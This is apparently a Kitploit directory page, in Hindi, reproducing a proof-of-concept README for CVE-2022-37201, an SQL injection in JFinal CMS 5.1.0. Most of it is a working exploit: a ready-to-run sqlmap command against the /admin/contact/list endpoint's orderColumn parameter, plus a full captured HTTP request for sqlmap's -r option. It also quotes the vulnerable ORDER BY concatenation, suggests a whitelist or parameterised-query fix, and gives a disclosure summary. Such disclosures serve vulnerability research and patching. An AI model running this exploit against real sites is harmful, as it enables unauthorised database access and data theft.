Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-37201 — CVE-2022-37201 प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/againstthelight/cve-2022-37201
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubagainstthelight/cve-2022-37201

CVE-2022-37201

CVE-2022-37201 प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-37201

CVE-2022-37201 POC

POC

सबसे पहले, आपको sqlmap इंस्टॉल करना चाहिए

आपको सेट करने की आवश्यकता है

  • लक्ष्य डोमेन या IP
  • आपका कुकी

फिर शेल चलाएँ

root@kitploit:~
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db

image-20220730053527316

कभी-कभी आपको जानना चाहिए कि /jfinal_cms/ आवश्यक नहीं है, आपको रूट का निर्णय लेना होगा

सिद्धांत

आप इंटरफ़ेस /system/menu/list का कोड देख सकते हैं

root@kitploit:~
sql.append(" order by ").append(orderBy);

यहाँ एक SQL स्टेटमेंट सीधे जोड़ा गया है

और भी

SQL इंजेक्शन को रोकने का कोई उपाय नहीं है क्योंकि यहाँ SQL इंजेक्शन आवश्यक है

समाधान

इस फंक्शन पॉइंट का विश्लेषण करके, मैंने पाया कि orderby का इंजेक्शन निश्चित है, जैसे id, name, menu key, तो आप पैरामीटराइज्ड क्वेरी का उपयोग करने या एक व्हाइटलिस्ट बनाने का प्रयास कर सकते हैं

और क्या

मेरा परीक्षण

root@kitploit:~
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close

form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10

इसे sqlmap में चलाएँ!!! -r का उपयोग करें

[सुझाया गया विवरण] JFinal CMS 5.1.0 SQL इंजेक्शन के लिए असुरक्षित है।


[अतिरिक्त जानकारी] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[भेद्यता प्रकार] SQL इंजेक्शन


[उत्पाद विक्रेता] विकास समूह


[प्रभावित उत्पाद कोड बेस] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0


[प्रभावित घटक] ये इंटरफ़ेस एक ही घटक का उपयोग नहीं करते हैं, न ही उनमें फ़िल्टर हैं, बल्कि प्रत्येक अपनी स्वयं की SQL संयोजन विधि का उपयोग करता है, जिसके परिणामस्वरूप SQL इंजेक्शन होता है।


[हमले का प्रकार] दूरस्थ


[प्रभाव कोड निष्पादन] सत्य


[प्रभाव सूचना प्रकटीकरण] सत्य


[हमले के वेक्टर] उपयोगकर्ता लॉगिन आवश्यक है


[संदर्भ] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[खोजकर्ता] jw5t

टूल डाउनलोड करें